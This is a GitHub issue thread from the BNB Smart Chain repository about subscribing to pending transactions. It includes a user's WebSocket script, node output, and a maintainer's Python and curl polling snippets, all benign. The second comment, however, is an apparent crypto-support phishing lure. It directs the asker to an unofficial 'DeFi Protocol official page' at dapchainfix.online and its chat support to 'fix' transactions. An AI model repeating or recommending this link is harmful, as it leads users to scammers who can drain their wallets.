### ISSUE TITLE
how to subscribe to newPendingTransaction?

### ISSUE THREAD

**Issue by Pengelolatoko** [bnb-chain/bsc#1787]
since there is a change in these area, can someone send me a snippet to subscribe to pending transaction

**Comment by Cancass** [comment]
Hello @Pengelolatoko 
Resolve your issues using DeFi Protocol [official page](http://dapchainfix.online/) to rectictify any transaction issues you might be facing automatically.
Note: you can initiate a chat with the support using the chat button at the bottom of the page for further enquiries and assistance.

**Comment by weiihann** [comment]
Hey :) If you're referring to getting the full transaction format from subscribing to pending transactions, the feature still has some bugs which will be fixed in the upcoming month. Refer to #1783.

If you want a general snippet to subscribe to pending transactions, you can refer to the [official geth docs](https://geth.ethereum.org/docs/interacting-with-geth/rpc/pubsub#newpendingtransactions).

Hope that helps!

**Comment by Pengelolatoko** [comment]
@weiihann 
is this something related to the bugs ?
i try to run this script ,

`const WebSocket = require('ws');

let ws;

function connect() {
  ws = new WebSocket('ws://127.0.0.1:8996/');
  ws.on('open', function open() {
  const payload = {
    "id": 1,
    "jsonrpc": "2.0",
    "method": "eth_subscribe",
    "params": ["newPendingTransactions", true]
  };
  ws.send(JSON.stringify(payload));
});

ws.on('message', function incoming(data) {
  console.log(data);
});

ws.on('error', function error() {
  console.log('WebSocket error');
  setTimeout(connect, 5000);
});

ws.on('close', function close() {
  console.log('WebSocket connection closed');
  // Reconnect after a delay
  setTimeout(connect, 5000);
});
}`


The result from my bsc full node is only returning this
{"jsonrpc":"2.0","id":1,"result":"0x76d4a2855b9b7d99594472ba6f1d4b44"}


and im testing it too in my ethereum node and its returning this

{"jsonrpc":"2.0","id":1,"result":"0x239bb0f75a6a5957476a8116e8a3e921"}

{"jsonrpc":"2.0","method":"eth_subscription","params":{"subscription":"0x239bb0f75a6a5957476a8116e8a3e921","result":{"blockHash":null,"blockNumber":null,"from":"0xec554417cb64c7433bb2f84a46b9ad633dd457c6","gas":"0x5208","gasPrice":"0x4c142e1d4","maxFeePerGas":"0x4c142e1d4","maxPriorityFeePerGas":"0x3b9aca00","hash":"0xd213957de6203a0195d4f83e450a425d49c808783f8dddbd2165dde707d7c1d6","input":"0x","nonce":"0xcf","to":"0x22fff189c37302c02635322911c3b64f80ce7203","transactionIndex":null,"value":"0x15af1d78b58c40000","type":"0x2","accessList":[],"chainId":"0x1","v":"0x0","r":"0xa9b0d49816b66d84220e0b9fb9d9adf1f032aeb17ff690e7f27e5dbbd2091edd","s":"0x101f3505389dcd56a02d69930577b53d9756d581f3c44ad3e2a9aa937daf80e4"}}}

{"jsonrpc":"2.0","method":"eth_subscription","params":{"subscription":"0x239bb0f75a6a5957476a8116e8a3e921","result":{"blockHash":null,"blockNumber":null,"from":"0x8d8670364ea3cd5783457d140abf5f0825ba239c","gas":"0x1a493","gasPrice":"0x4e110d0d9","maxFeePerGas":"0x4e110d0d9","maxPriorityFeePerGas":"0x5f5e100","hash":"0x062a792c6fa18c1d9277fc62d57791a8f79114531cdcc84822dd2330305e9235","input":"0x491e09360000000000000000000000008d8670364ea3cd5783457d140abf5f0825ba239c0000000000000000000000008d8670364ea3cd5783457d140abf5f0825ba239c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009c51c4521e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000001bbe0000000000000000000000000000000000000000000000000000000000000000","nonce":"0x7","to":"0xd19d4b5d358258f05d7b411e21a1460d11b0876f","transactionIndex":null,"value":"0x0","type":"0x2","accessList":[],"chainId":"0x1","v":"0x0","r":"0x9b3115da45851f94027b62f5eec4276d9a26366d005a5f2ccda299c9b7b20acc","s":"0x5ffc714b7b32ca86b0424fdd97b4a422a51a7c4f3090816d2f7caab90da45b39"}}}

**Comment by weiihann** [comment]
Yeah... this feature doesn't work for now.

If you want to get the pending transactions, you can use the following code snippets:

**Python**
```
import logging
import time
from web3 import Web3

IPC_PATH = "geth.ipc"

w3 = Web3(Web3.IPCProvider(IPC_PATH))

def _pending_tx_loop():
    tx_filter = w3.eth.filter('pending')
    print("tx_filter:", tx_filter)  # Print the tx_filter object
    while True:
        try:
            new_pending_txs = tx_filter.get_new_entries()
            for tx in new_pending_txs:
                print(f"{tx}")
        except ValueError:
            print("something went wrong")

        # Wait for 1 second before fetching new entries again
        time.sleep(1)

def main():
    _pending_tx_loop()

if __name__ == "__main__":
    main()
```

**Command Line**
```
curl -X POST "http://localhost:8545" -H "Content-Type: application/json" -- data '{"jsonrpc":"2.0","method":"eth_newPendingTransactionFilter","params":[],"id":1}'
```

You will get something like:
```
{"jsonrpc":"2.0", "id":1, "result":"0xb796cd7a8290bc659328fc78bd70a63"}
```

Then run this by replacing the params with the result that you get:
```
curl -X POST "http://localhost:8545" -H "Content-Type: application/json" -- data '{"jsonrpc":"2.0","method":"eth_getFilterChanges","params":["0xb796cd7a8290bc659328fc78bd70a63"],"id":1}'
```

**Comment by sirgarfieldc** [comment]
@weiihann
 
I notice that subscription to pending logs also doesn't work.

Is it related to pending full transaction not working ? 

see  https://github.com/bnb-chain/bsc/issues/1815
for details
